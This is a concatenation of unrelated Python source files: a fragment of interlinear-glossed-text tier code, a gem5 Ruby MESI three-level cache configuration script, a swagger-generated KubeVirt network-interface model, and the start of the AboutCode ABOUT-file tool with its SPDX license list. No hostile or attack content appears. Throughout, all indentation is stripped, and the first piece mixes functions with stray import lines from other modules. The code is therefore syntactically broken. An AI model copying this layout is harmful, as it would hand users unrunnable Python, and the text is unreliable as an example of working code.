item = RGLine(id=gen_item_id(tier.id, len(tier)),
text=func(text),
alignment=clean_lines[0].id,
attributes=attributes)
tier.add(item)
def from_raw_text(string, corpus=None, idnum=None):
"""
Method to create an IGT instance from a raw three lines of text, assuming L-G-T.
:param string:
:param corpus:
:param idnum:
"""
lines = string.split('\n')
if len(lines) < 3:
raise RawTextParseError("Three lines are assumed for raw text. Instead got {}".format(len(lines)))
if idnum is not None:
id = gen_item_id('i', idnum)
elif corpus:
id = corpus.askIgtId()
else:
corpus = RGCorpus()
id = corpus.askIgtId()
inst = RGIgt(id = id)
rt = RGLineTier(id = RAW_ID, type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:RAW_STATE}, igt=inst)
for i, l in enumerate(lines):
# If we have four lines, assume that the first is
# native orthography
if len(lines) == 4:
if i == 0:
linetag = ODIN_LANG_TAG + '+FR'
if i == 1:
linetag = ODIN_LANG_TAG
if i == 2:
linetag = ODIN_GLOSS_TAG
if i == 3:
linetag = ODIN_TRANS_TAG
elif len(lines) == 3:
if i == 0:
linetag = ODIN_LANG_TAG
elif i == 1:
linetag = ODIN_GLOSS_TAG
elif i == 2:
linetag = ODIN_TRANS_TAG
elif len(lines) == 2:
if i == 0:
linetag = ODIN_LANG_TAG
if i == 1:
linetag = ODIN_TRANS_TAG
else:
raise RawTextParseError("Unknown number of lines...")
if not l.strip():
raise RawTextParseError("The {} line is empty: {}".format(linetag, l))
li = RGLine(id=rt.askItemId(), text=l, attributes={'tag':linetag})
rt.append(li)
inst.append(rt)
try:
inst.basic_processing()
except GlossLangAlignException as glae:
CONVERT_LOG.warn('Gloss and language lines could not be automatically aligned for instance "{}".'.format(inst.id))
# CONVERT_LOG.warn("Basic processing failed for instance {}".format(inst.id))
return inst
# -------------------------------------------
def get_raw_tier(inst):
"""
Retrieve the raw ODIN tier, otherwise raise an exception.
"""
rt = raw_tier(inst)
if not rt:
raise NoODINRawException('No raw tier found.')
else:
return rt
def get_normal_tier(inst, clean=True, generate=True, force_generate=False):
"""
:param inst: The instance to retrieve the normal tier from.
:param clean: Whether to attempt to automatically clean the instance or not.
:type clean: bool
:param generate: Whether to generate the normalized line if it doesn't exist.
:type generate: bool
:param force_generate: If the normal line already exists, overwrite it?
:type force_generate: bool
:return:
"""
# If a normal tier already exists, return it.
normal_tier = find_in_obj(inst, type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:NORM_STATE})
# Otherwise, create a new one, with only L, G and T lines.
if force_generate or (normal_tier is None and generate):
if normal_tier is not None:
inst.remove(normal_tier)
normal_tier = RGLineTier(id = NORM_ID, type=ODIN_TYPE,
attributes={STATE_ATTRIBUTE:NORM_STATE, ALIGNMENT:get_clean_tier(inst).id})
# Get one item per...
add_normal_line_to_tier(inst, normal_tier, ODIN_LANG_TAG, clean_lang_string if clean else lambda x: x)
add_normal_line_to_tier(inst, normal_tier, ODIN_GLOSS_TAG, clean_gloss_string if clean else lambda x: x)
add_normal_line_to_tier(inst, normal_tier, ODIN_TRANS_TAG, clean_trans_string if clean else lambda x: x)
# -------------------------------------------
# Now, remove the whitespace shared between lines.
# -------------------------------------------
textlines = strip_leading_whitespace([i.text for i in normal_tier])
for textline, item in zip(textlines, normal_tier):
item.text = textline
inst.append(normal_tier)
return normal_tier
elif normal_tier is not None:
return normal_tier
else:
return None
def get_clean_tier(inst, merge=False, generate=True, force_generate=False):
"""
If the clean odin tier exists, return it. Otherwise, create it.
"""
# -------------------------------------------
# Search for the clean tier
# -------------------------------------------
clean_tier = find_in_obj(inst, type=ODIN_TYPE, attributes={STATE_ATTRIBUTE:CLEAN_STATE})
# Remove the clean tier if we are regenerating.
if clean_tier is not None and force_generate:
inst.remove(clean_tier)
# -------------------------------------------
# If we want to force regenerate the tier, or
# it is not found and we want to generate it
# freshly.
# -------------------------------------------
if force_generate or ((clean_tier is None) and generate):
# Otherwise, we will make our own:
raw_tier = get_raw_tier(inst)
# Initialize the clean tier...
clean_tier = RGLineTier(id = CLEAN_ID, type=ODIN_TYPE,
attributes={STATE_ATTRIBUTE:CLEAN_STATE,
ALIGNMENT:raw_tier.id})
# Gather the different tags used in this tier.
# Note that we don't want to discard non-L,G,T tiers yet.
line_tags = DefaultOrderedDict(list)
for l in raw_tier:
tags = l.attributes['tag'].split('+')
primary = tags[0]
others = tags[1:]
line_tags[primary].append(l)
# Now, the line_tags should be indexed by the primary
# tag (L, G, T, etc...) with the +'s after it...
# Now, go through and merge if needed.
for primary_tag in line_tags.keys():
lines = line_tags[primary_tag]
# If there is only one line for the given tag,
# simply return the first line.
if len(lines) == 1:
text = lines[0].value()
new_tag = lines[0].attributes[ODIN_TAG_ATTRIBUTE]
align_id = lines[0].id
item_judgment = lines[0].attributes.get(ODIN_JUDGMENT_ATTRIBUTE)
# If there are multiple lines for a given tag,
# concatenate them to a single line.
elif len(lines) > 1:
PARSELOG.info('Corruption detected in instance %s: %s' % (inst.id, [l.attributes['tag'] for l in lines]))
for l in lines:
PARSELOG.debug('BEFORE: %s' % l)
# The new text should be the concatenation of the multiple lines...
text = concat_lines([l.value() for l in lines if l.value() is not None])
PARSELOG.debug('AFTER: %s' % text)
new_tag = primary_tag
align_id = ','.join([l.id for l in lines])
item_judgment = None
for l in lines:
j = l.attributes.get(ODIN_JUDGMENT_ATTRIBUTE)
if j is not None:
item_judgment = j
break
# Set up the attributes for the new line
item_attributes = {ODIN_TAG_ATTRIBUTE: new_tag}
# If we have a judgment, add it to the attributes.
# Otherwise, don't add it.
if item_judgment is not None:
item_attributes[ODIN_JUDGMENT_ATTRIBUTE] = item_judgment
item = RGLine(id=clean_tier.askItemId(),
alignment=align_id, text=text,
attributes=item_attributes)
clean_tier.add(item)
inst.append(clean_tier)
return clean_tier
# -------------------------------------------
# Finally, if the tier exists
# -------------------------------------------
elif clean_tier is not None:
return clean_tier
# -------------------------------------------
# Otherwise, just return None
# -------------------------------------------
else:
return None
def replace_lines(inst, clean_lines, norm_lines):
"""
Given an instance and a list of clean lines and normal lines,
add a cleaned tier and normalized if they do not already exist,
otherwise, replace them.
:param inst:
:type inst: xigt.Igt
:param clean_lines:
:type clean_lines: list[dict]
:param norm_lines:
:type norm_lines: list[dict]
"""
# -------------------------------------------
# Remove the old clean/norm lines.
# -------------------------------------------
old_clean_tier = cleaned_tier(inst)
if old_clean_tier is not None:
inst.remove(old_clean_tier)
old_norm_tier = normalized_tier(inst)
if old_norm_tier is not None:
inst.remove(old_norm_tier)
# -------------------------------------------
# Now, add the clean/norm lines, if provided.
# -------------------------------------------
if clean_lines:
new_clean_tier = create_text_tier_from_lines(inst, clean_lines, CLEAN_ID, CLEAN_STATE)
inst.append(new_clean_tier)
if norm_lines:
new_norm_tier = create_text_tier_from_lines(inst, norm_lines, NORM_ID, NORM_STATE)
inst.append(new_norm_tier)
return inst
from .consts import RAW_ID, ODIN_TYPE, STATE_ATTRIBUTE, RAW_STATE, ODIN_LANG_TAG, ODIN_GLOSS_TAG, \
ODIN_TRANS_TAG, ODIN_TAG_ATTRIBUTE
from .rgxigt import RGCorpus, RGIgt, RGLineTier, RGLine, CONVERT_LOG, RGTier, gen_tier_id, RGItem, PARSELOG, \
gen_item_id
from .exceptions import GlossLangAlignException, RawTextParseError, RGXigtException, XigtFormatException
from .search import find_in_obj, raw_tier
from .consts import *
from .igtutils import merge_lines, clean_lang_string, clean_gloss_string, clean_trans_string, concat_lines
from .rgxigt import RGLineTier, PARSELOG, RGLine, RGTier, NoODINRawException
from .creation import *
|
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009,2015 Advanced Micro Devices, Inc.
# Copyright (c) 2013 Mark D. Hill and David A. Wood
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
# Nilay Vaish
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from Ruby import create_topology, create_directories
from Ruby import send_evicts
#
# Declare caches used by the protocol
#
class L0Cache(RubyCache): pass
class L1Cache(RubyCache): pass
class L2Cache(RubyCache): pass
def define_options(parser):
parser.add_option("--num-clusters", type = "int", default = 1,
help = "number of clusters in a design in which there are shared\
caches private to clusters")
return
def create_system(options, full_system, system, dma_ports, ruby_system):
if buildEnv['PROTOCOL'] != 'MESI_Three_Level':
fatal("This script requires the MESI_Three_Level protocol to be\
built.")
cpu_sequencers = []
#
# The ruby network creation expects the list of nodes in the system to be
# consistent with the NetDest list. Therefore the l1 controller nodes
# must be listed before the directory nodes and directory nodes before
# dma nodes, etc.
#
l0_cntrl_nodes = []
l1_cntrl_nodes = []
l2_cntrl_nodes = []
dma_cntrl_nodes = []
assert (options.num_cpus % options.num_clusters == 0)
num_cpus_per_cluster = options.num_cpus / options.num_clusters
assert (options.num_l2caches % options.num_clusters == 0)
num_l2caches_per_cluster = options.num_l2caches / options.num_clusters
l2_bits = int(math.log(num_l2caches_per_cluster, 2))
block_size_bits = int(math.log(options.cacheline_size, 2))
l2_index_start = block_size_bits + l2_bits
#
# Must create the individual controllers before the network to ensure the
# controller constructors are called before the network constructor
#
for i in xrange(options.num_clusters):
for j in xrange(num_cpus_per_cluster):
#
# First create the Ruby objects associated with this cpu
#
l0i_cache = L0Cache(size = '4096B', assoc = 1, is_icache = True,
start_index_bit = block_size_bits,
replacement_policy = LRUReplacementPolicy())
l0d_cache = L0Cache(size = '4096B', assoc = 1, is_icache = False,
start_index_bit = block_size_bits,
replacement_policy = LRUReplacementPolicy())
# the ruby random tester reuses num_cpus to specify the
# number of cpu ports connected to the tester object, which
# is stored in system.cpu. because there is only ever one
# tester object, num_cpus is not necessarily equal to the
# size of system.cpu; therefore if len(system.cpu) == 1
# we use system.cpu[0] to set the clk_domain, thereby ensuring
# we don't index off the end of the cpu list.
if len(system.cpu) == 1:
clk_domain = system.cpu[0].clk_domain
else:
clk_domain = system.cpu[i].clk_domain
l0_cntrl = L0Cache_Controller(
version = i * num_cpus_per_cluster + j, Icache = l0i_cache,
Dcache = l0d_cache, send_evictions = send_evicts(options),
clk_domain = clk_domain, ruby_system = ruby_system)
cpu_seq = RubySequencer(version = i * num_cpus_per_cluster + j,
icache = l0i_cache,
clk_domain = clk_domain,
dcache = l0d_cache,
ruby_system = ruby_system)
l0_cntrl.sequencer = cpu_seq
l1_cache = L1Cache(size = options.l1d_size,
assoc = options.l1d_assoc,
start_index_bit = block_size_bits,
is_icache = False)
l1_cntrl = L1Cache_Controller(
version = i * num_cpus_per_cluster + j,
cache = l1_cache, l2_select_num_bits = l2_bits,
cluster_id = i, ruby_system = ruby_system)
exec("ruby_system.l0_cntrl%d = l0_cntrl"
% ( i * num_cpus_per_cluster + j))
exec("ruby_system.l1_cntrl%d = l1_cntrl"
% ( i * num_cpus_per_cluster + j))
#
# Add controllers and sequencers to the appropriate lists
#
cpu_sequencers.append(cpu_seq)
l0_cntrl_nodes.append(l0_cntrl)
l1_cntrl_nodes.append(l1_cntrl)
# Connect the L0 and L1 controllers
l0_cntrl.mandatoryQueue = MessageBuffer()
l0_cntrl.bufferToL1 = MessageBuffer(ordered = True)
l1_cntrl.bufferFromL0 = l0_cntrl.bufferToL1
l0_cntrl.bufferFromL1 = MessageBuffer(ordered = True)
l1_cntrl.bufferToL0 = l0_cntrl.bufferFromL1
# Connect the L1 controllers and the network
l1_cntrl.requestToL2 = MessageBuffer()
l1_cntrl.requestToL2.master = ruby_system.network.slave
l1_cntrl.responseToL2 = MessageBuffer()
l1_cntrl.responseToL2.master = ruby_system.network.slave
l1_cntrl.unblockToL2 = MessageBuffer()
l1_cntrl.unblockToL2.master = ruby_system.network.slave
l1_cntrl.requestFromL2 = MessageBuffer()
l1_cntrl.requestFromL2.slave = ruby_system.network.master
l1_cntrl.responseFromL2 = MessageBuffer()
l1_cntrl.responseFromL2.slave = ruby_system.network.master
for j in xrange(num_l2caches_per_cluster):
l2_cache = L2Cache(size = options.l2_size,
assoc = options.l2_assoc,
start_index_bit = l2_index_start)
l2_cntrl = L2Cache_Controller(
version = i * num_l2caches_per_cluster + j,
L2cache = l2_cache, cluster_id = i,
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.l2_cntrl%d = l2_cntrl"
% (i * num_l2caches_per_cluster + j))
l2_cntrl_nodes.append(l2_cntrl)
# Connect the L2 controllers and the network
l2_cntrl.DirRequestFromL2Cache = MessageBuffer()
l2_cntrl.DirRequestFromL2Cache.master = ruby_system.network.slave
l2_cntrl.L1RequestFromL2Cache = MessageBuffer()
l2_cntrl.L1RequestFromL2Cache.master = ruby_system.network.slave
l2_cntrl.responseFromL2Cache = MessageBuffer()
l2_cntrl.responseFromL2Cache.master = ruby_system.network.slave
l2_cntrl.unblockToL2Cache = MessageBuffer()
l2_cntrl.unblockToL2Cache.slave = ruby_system.network.master
l2_cntrl.L1RequestToL2Cache = MessageBuffer()
l2_cntrl.L1RequestToL2Cache.slave = ruby_system.network.master
l2_cntrl.responseToL2Cache = MessageBuffer()
l2_cntrl.responseToL2Cache.slave = ruby_system.network.master
# Run each of the ruby memory controllers at a ratio of the frequency of
# the ruby system
# clk_divider value is a fix to pass regression.
ruby_system.memctrl_clk_domain = DerivedClockDomain(
clk_domain = ruby_system.clk_domain, clk_divider = 3)
dir_cntrl_nodes = create_directories(options, system.mem_ranges,
ruby_system)
for dir_cntrl in dir_cntrl_nodes:
# Connect the directory controllers and the network
dir_cntrl.requestToDir = MessageBuffer()
dir_cntrl.requestToDir.slave = ruby_system.network.master
dir_cntrl.responseToDir = MessageBuffer()
dir_cntrl.responseToDir.slave = ruby_system.network.master
dir_cntrl.responseFromDir = MessageBuffer()
dir_cntrl.responseFromDir.master = ruby_system.network.slave
dir_cntrl.responseFromMemory = MessageBuffer()
for i, dma_port in enumerate(dma_ports):
#
# Create the Ruby objects associated with the dma controller
#
dma_seq = DMASequencer(version = i, ruby_system = ruby_system)
dma_cntrl = DMA_Controller(version = i,
dma_sequencer = dma_seq,
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.dma_cntrl%d = dma_cntrl" % i)
exec("ruby_system.dma_cntrl%d.dma_sequencer.slave = dma_port" % i)
dma_cntrl_nodes.append(dma_cntrl)
# Connect the dma controller to the network
dma_cntrl.mandatoryQueue = MessageBuffer()
dma_cntrl.responseFromDir = MessageBuffer(ordered = True)
dma_cntrl.responseFromDir.slave = ruby_system.network.master
dma_cntrl.requestToDir = MessageBuffer()
dma_cntrl.requestToDir.master = ruby_system.network.slave
all_cntrls = l0_cntrl_nodes + \
l1_cntrl_nodes + \
l2_cntrl_nodes + \
dir_cntrl_nodes + \
dma_cntrl_nodes
# Create the io controller and the sequencer
if full_system:
io_seq = DMASequencer(version=len(dma_ports), ruby_system=ruby_system)
ruby_system._io_port = io_seq
io_controller = DMA_Controller(version = len(dma_ports),
dma_sequencer = io_seq,
ruby_system = ruby_system)
ruby_system.io_controller = io_controller
# Connect the dma controller to the network
io_controller.mandatoryQueue = MessageBuffer()
io_controller.responseFromDir = MessageBuffer(ordered = True)
io_controller.responseFromDir.slave = ruby_system.network.master
io_controller.requestToDir = MessageBuffer()
io_controller.requestToDir.master = ruby_system.network.slave
all_cntrls = all_cntrls + [io_controller]
ruby_system.network.number_of_virtual_networks = 3
topology = create_topology(all_cntrls, options)
return (cpu_sequencers, dir_cntrl_nodes, topology)
|
|
# coding: utf-8
"""
KubeVirt API
This is KubeVirt API an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: kubevirt-dev@googlegroups.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1VirtualMachineInstanceNetworkInterface(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'info_source': 'str',
'interface_name': 'str',
'ip_address': 'str',
'ip_addresses': 'list[str]',
'mac': 'str',
'name': 'str'
}
attribute_map = {
'info_source': 'infoSource',
'interface_name': 'interfaceName',
'ip_address': 'ipAddress',
'ip_addresses': 'ipAddresses',
'mac': 'mac',
'name': 'name'
}
def __init__(self, info_source=None, interface_name=None, ip_address=None, ip_addresses=None, mac=None, name=None):
"""
V1VirtualMachineInstanceNetworkInterface - a model defined in Swagger
"""
self._info_source = None
self._interface_name = None
self._ip_address = None
self._ip_addresses = None
self._mac = None
self._name = None
if info_source is not None:
self.info_source = info_source
if interface_name is not None:
self.interface_name = interface_name
if ip_address is not None:
self.ip_address = ip_address
if ip_addresses is not None:
self.ip_addresses = ip_addresses
if mac is not None:
self.mac = mac
if name is not None:
self.name = name
@property
def info_source(self):
"""
Gets the info_source of this V1VirtualMachineInstanceNetworkInterface.
Specifies the origin of the interface data collected. values: domain, guest-agent, or both
:return: The info_source of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._info_source
@info_source.setter
def info_source(self, info_source):
"""
Sets the info_source of this V1VirtualMachineInstanceNetworkInterface.
Specifies the origin of the interface data collected. values: domain, guest-agent, or both
:param info_source: The info_source of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._info_source = info_source
@property
def interface_name(self):
"""
Gets the interface_name of this V1VirtualMachineInstanceNetworkInterface.
The interface name inside the Virtual Machine
:return: The interface_name of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._interface_name
@interface_name.setter
def interface_name(self, interface_name):
"""
Sets the interface_name of this V1VirtualMachineInstanceNetworkInterface.
The interface name inside the Virtual Machine
:param interface_name: The interface_name of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._interface_name = interface_name
@property
def ip_address(self):
"""
Gets the ip_address of this V1VirtualMachineInstanceNetworkInterface.
IP address of a Virtual Machine interface. It is always the first item of IPs
:return: The ip_address of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._ip_address
@ip_address.setter
def ip_address(self, ip_address):
"""
Sets the ip_address of this V1VirtualMachineInstanceNetworkInterface.
IP address of a Virtual Machine interface. It is always the first item of IPs
:param ip_address: The ip_address of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._ip_address = ip_address
@property
def ip_addresses(self):
"""
Gets the ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
List of all IP addresses of a Virtual Machine interface
:return: The ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
:rtype: list[str]
"""
return self._ip_addresses
@ip_addresses.setter
def ip_addresses(self, ip_addresses):
"""
Sets the ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
List of all IP addresses of a Virtual Machine interface
:param ip_addresses: The ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
:type: list[str]
"""
self._ip_addresses = ip_addresses
@property
def mac(self):
"""
Gets the mac of this V1VirtualMachineInstanceNetworkInterface.
Hardware address of a Virtual Machine interface
:return: The mac of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._mac
@mac.setter
def mac(self, mac):
"""
Sets the mac of this V1VirtualMachineInstanceNetworkInterface.
Hardware address of a Virtual Machine interface
:param mac: The mac of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._mac = mac
@property
def name(self):
"""
Gets the name of this V1VirtualMachineInstanceNetworkInterface.
Name of the interface, corresponds to name of the network assigned to the interface
:return: The name of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this V1VirtualMachineInstanceNetworkInterface.
Name of the interface, corresponds to name of the network assigned to the interface
:param name: The name of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._name = name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1VirtualMachineInstanceNetworkInterface):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# ============================================================================
# Copyright (c) 2014 nexB Inc. http://www.nexb.com/ - All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
AboutCode is a tool to process ABOUT files. ABOUT files are small text files
that document the provenance (aka. the origin and license) of software
components as well as the essential obligation such as attribution/credits and
source code redistribution. See the ABOUT spec at http://dejacode.org.
AbouCode reads and validates ABOUT files and collect software components
inventories.
"""
from __future__ import print_function
from StringIO import StringIO
import codecs
from collections import namedtuple
import csv
from datetime import datetime
from email.parser import HeaderParser
from os.path import basename, dirname, join, normpath, realpath
import errno
import httplib
import logging
import optparse
import os
import posixpath
import socket
import string
import sys
import urlparse
import ntpath
__version__ = '2.0.1'
# See http://dejacode.org
__about_spec_version__ = '1.0'
__copyright__ = """
Copyright (c) 2013-2014 nexB Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setLevel(logging.CRITICAL)
handler.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))
logger.addHandler(handler)
def repr_problem(obj):
"""
Return a formatted representation of a given Warn or Error object
suitable for reporting.
"""
field_name = obj.field_name
field_value = obj.field_value
message = obj.message
return ('Field: %(field_name)s, '
'Value: %(field_value)s, '
'Message: %(message)s' % locals())
Warn = namedtuple('Warn', 'code field_name field_value message',)
Warn.__repr__ = repr_problem
Error = namedtuple('Error', 'code field_name field_value message',)
Error.__repr__ = repr_problem
IGNORED = 'field or line ignored problem'
VALUE = 'missing or empty or multiple value problem'
FILE = 'file problem'
URL = 'URL problem'
VCS = 'Version control problem'
DATE = 'Date problem'
ASCII = 'ASCII problem'
SPDX = 'SPDX license problem'
UNKNOWN = 'Unknown problem'
GENATTRIB = 'Attribution generation problem'
MANDATORY_FIELDS = (
'name',
'version',
)
BASIC_FIELDS = (
'about_resource',
'spec_version',
'date',
'description',
'description_file',
'home_url',
'download_url',
'readme',
'readme_file',
'install',
'install_file',
'changelog',
'changelog_file',
'news',
'news_file',
'news_url',
'notes',
'notes_file',
)
OWNERSHIP_FIELDS = (
'contact',
'owner',
'author',
'author_file',
'copyright',
'copyright_file',
)
LICENSE_FIELDS = (
'notice_file',
'notice_url',
'license_text_file',
'license_url',
'license_spdx',
)
FLAG_FIELDS = (
'redistribute',
'attribute',
'track_changes',
)
VCS_FIELDS = (
'vcs_tool',
'vcs_repository',
'vcs_path',
'vcs_tag',
'vcs_branch',
'vcs_revision',
)
CHECKSUM_FIELDS = (
'checksum_sha1',
'checksum_md5',
'checksum_sha256'
)
DJE_FIELDS = (
'dje_component',
'dje_license_key',
'dje_organization',
'dje_license_name'
)
OPTIONAL_FIELDS = (BASIC_FIELDS
+ OWNERSHIP_FIELDS
+ LICENSE_FIELDS
+ FLAG_FIELDS
+ VCS_FIELDS
+ CHECKSUM_FIELDS
+ DJE_FIELDS)
FILE_LOCATIONS_FIELDS = (
'about_resource_location',
'description_file_location',
'readme_file_location',
'install_file_location',
'changelog_file_location',
'news_file_location',
'notes_file_location',
'author_file_location',
'copyright_file_location',
'notice_file_location',
'license_text_file_location',
)
ERROR_WARN_FIELDS = (
'warnings',
'errors'
)
HEADER_ROW_FIELDS = (('about_file',)
+ MANDATORY_FIELDS
+ OPTIONAL_FIELDS)
# SPDX License Identifiers from http://spdx.org/licenses/
# based on SPDX License List version 1.18 released on 2013-04-10
SPDX_LICENSES = (
'AFL-1.1',
'AFL-1.2',
'AFL-2.0',
'AFL-2.1',
'AFL-3.0',
'APL-1.0',
'Aladdin',
'ANTLR-PD',
'Apache-1.0',
'Apache-1.1',
'Apache-2.0',
'APSL-1.0',
'APSL-1.1',
'APSL-1.2',
'APSL-2.0',
'Artistic-1.0',
'Artistic-2.0',
'AAL',
'BitTorrent-1.0',
'BitTorrent-1.1',
'BSL-1.0',
'BSD-2-Clause',
'BSD-2-Clause-FreeBSD',
'BSD-2-Clause-NetBSD',
'BSD-3-Clause',
'BSD-3-Clause-Clear',
'BSD-4-Clause',
'BSD-4-Clause-UC',
'CECILL-1.0',
'CECILL-1.1',
'CECILL-2.0',
'CECILL-B',
'CECILL-C',
'ClArtistic',
'CNRI-Python',
'CNRI-Python-GPL-Compatible',
'CPOL-1.02',
'CDDL-1.0',
'CDDL-1.1',
'CPAL-1.0',
'CPL-1.0',
'CATOSL-1.1',
'Condor-1.1',
'CC-BY-1.0',
'CC-BY-2.0',
'CC-BY-2.5',
'CC-BY-3.0',
'CC-BY-ND-1.0',
'CC-BY-ND-2.0',
'CC-BY-ND-2.5',
'CC-BY-ND-3.0',
'CC-BY-NC-1.0',
'CC-BY-NC-2.0',
'CC-BY-NC-2.5',
'CC-BY-NC-3.0',
'CC-BY-NC-ND-1.0',
'CC-BY-NC-ND-2.0',
'CC-BY-NC-ND-2.5',
'CC-BY-NC-ND-3.0',
'CC-BY-NC-SA-1.0',
'CC-BY-NC-SA-2.0',
'CC-BY-NC-SA-2.5',
'CC-BY-NC-SA-3.0',
'CC-BY-SA-1.0',
'CC-BY-SA-2.0',
'CC-BY-SA-2.5',
'CC-BY-SA-3.0',
'CC0-1.0',
'CUA-OPL-1.0',
'D-FSL-1.0',
'WTFPL',
'EPL-1.0',
'eCos-2.0',
'ECL-1.0',
'ECL-2.0',
'EFL-1.0',
'EFL-2.0',
'Entessa',
'ErlPL-1.1',
'EUDatagrid',
'EUPL-1.0',
'EUPL-1.1',
'Fair',
'Frameworx-1.0',
'FTL',
'AGPL-1.0',
'AGPL-3.0',
'GFDL-1.1',
'GFDL-1.2',
'GFDL-1.3',
'GPL-1.0',
'GPL-1.0+',
'GPL-2.0',
'GPL-2.0+',
'GPL-2.0-with-autoconf-exception',
'GPL-2.0-with-bison-exception',
'GPL-2.0-with-classpath-exception',
'GPL-2.0-with-font-exception',
'GPL-2.0-with-GCC-exception',
'GPL-3.0',
'GPL-3.0+',
'GPL-3.0-with-autoconf-exception',
'GPL-3.0-with-GCC-exception',
'LGPL-2.1',
'LGPL-2.1+',
'LGPL-3.0',
'LGPL-3.0+',
'LGPL-2.0',
'LGPL-2.0+',
'gSOAP-1.3b',
'HPND',
'IPL-1.0',
'Imlib2',
'IJG',
'Intel',
'IPA',
'ISC',
'JSON',
'LPPL-1.3a',
'LPPL-1.0',
'LPPL-1.1',
'LPPL-1.2',
'LPPL-1.3c',
'Libpng',
'LPL-1.02',
'LPL-1.0',
'MS-PL',
'MS-RL',
'MirOS',
'MIT',
'Motosoto',
'MPL-1.0',
'MPL-1.1',
'MPL-2.0',
'MPL-2.0-no-copyleft-exception',
'Multics',
'NASA-1.3',
'Naumen',
'NBPL-1.0',
'NGPL',
'NOSL',
'NPL-1.0',
'NPL-1.1',
'Nokia',
'NPOSL-3.0',
'NTP',
'OCLC-2.0',
'ODbL-1.0',
'PDDL-1.0',
'OGTSL',
'OLDAP-2.2.2',
'OLDAP-1.1',
'OLDAP-1.2',
'OLDAP-1.3',
'OLDAP-1.4',
'OLDAP-2.0',
'OLDAP-2.0.1',
'OLDAP-2.1',
'OLDAP-2.2',
'OLDAP-2.2.1',
'OLDAP-2.3',
'OLDAP-2.4',
'OLDAP-2.5',
'OLDAP-2.6',
